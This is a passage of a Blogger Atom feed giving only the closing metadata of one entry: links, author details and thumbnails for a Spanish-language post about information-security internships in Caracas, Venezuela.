&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/4072668172531414660/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/08/pasantias-en-seguridad-de-la-informacion.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4072668172531414660'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4072668172531414660'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/08/pasantias-en-seguridad-de-la-informacion.html' title='Pasantías en Seguridad de la Información en Caracas - Venezuela'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixOGXzRtRW7E8wvVAVX4PPihof7u6pzMVfPnFdvrY8GVdo_KMZsjsu_qlic15FCVEqoZTmJhBiVlcoJt_cRnSAt7NvnTcPFpdOHviay76hyIFanoYIiGKCpPm5mq-kjhCxdhkFeqisKCI/s72-c/banner_oferta_pasantia_gr-620x279.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>